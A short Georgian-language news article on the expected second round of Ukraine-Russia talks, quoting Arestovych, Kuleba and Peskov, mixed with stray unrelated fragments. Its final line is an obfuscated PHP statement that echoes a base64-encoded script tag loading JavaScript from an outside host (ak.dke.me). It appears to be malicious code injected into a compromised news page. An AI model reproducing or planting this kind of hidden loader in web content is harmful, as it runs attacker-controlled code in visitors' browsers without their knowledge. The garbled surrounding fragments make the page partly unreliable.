celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ოფისის მრჩეველმა ალექსეი არესტოვიჩმა უკრაინა-რუსეთის მოლაპარაკების მეორე ეტაპის სავარაუდო თარიღი დაასახელა. როგორ მან ოფისში გამართული ბრიფინგის დროს განაცხადა, მოლაპარაკებები, შესაძლოა, დღეს, 2 მარტს გაიმართოს.
 
მისი ინფორმაციით, ქვეყნების დელეგაციების შემადგენლობა არ შეიცვლება და უკრაინა თავისი პოზიციების დაცვას გააგრძელებს.
 
რამდენიმე ხნით ადრე საგარეო საქმეთა მინისტრმა დმიტრო კულებამ განაცხადა, რომ უკრაინა რუსეთის ულტიმატუმს არ მიიღებს. წერს UNIANI.
 
რუსული გამოცემა TASS-ი კი იუწყებოდა, რომ რუსეთის დელეგაცია უკრაინასთან მოლაპარაკების მეორე შეხვედრის ადგილზე საღამოსკენ ჩავა და უკრაინულ მხარესთან საუბრისთვის მზად იქნება. "დღეს დღის მეორე ნახევარში, საღამოსკენ ჩვენი დელეგაცია ადგილზე იქნება და უკრაინულ დელეგაციას დაელოდება", - თქვა რუსეთის პრეზიდენტის პრესსპიკერმა დიმიტრი პესკოვმა. კითხვაზე - სად იმართება შეხვედრა, პესკოვმა უპასუხა, რომ ადგილს წინასწარ არ დაასახელებდა.
807
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");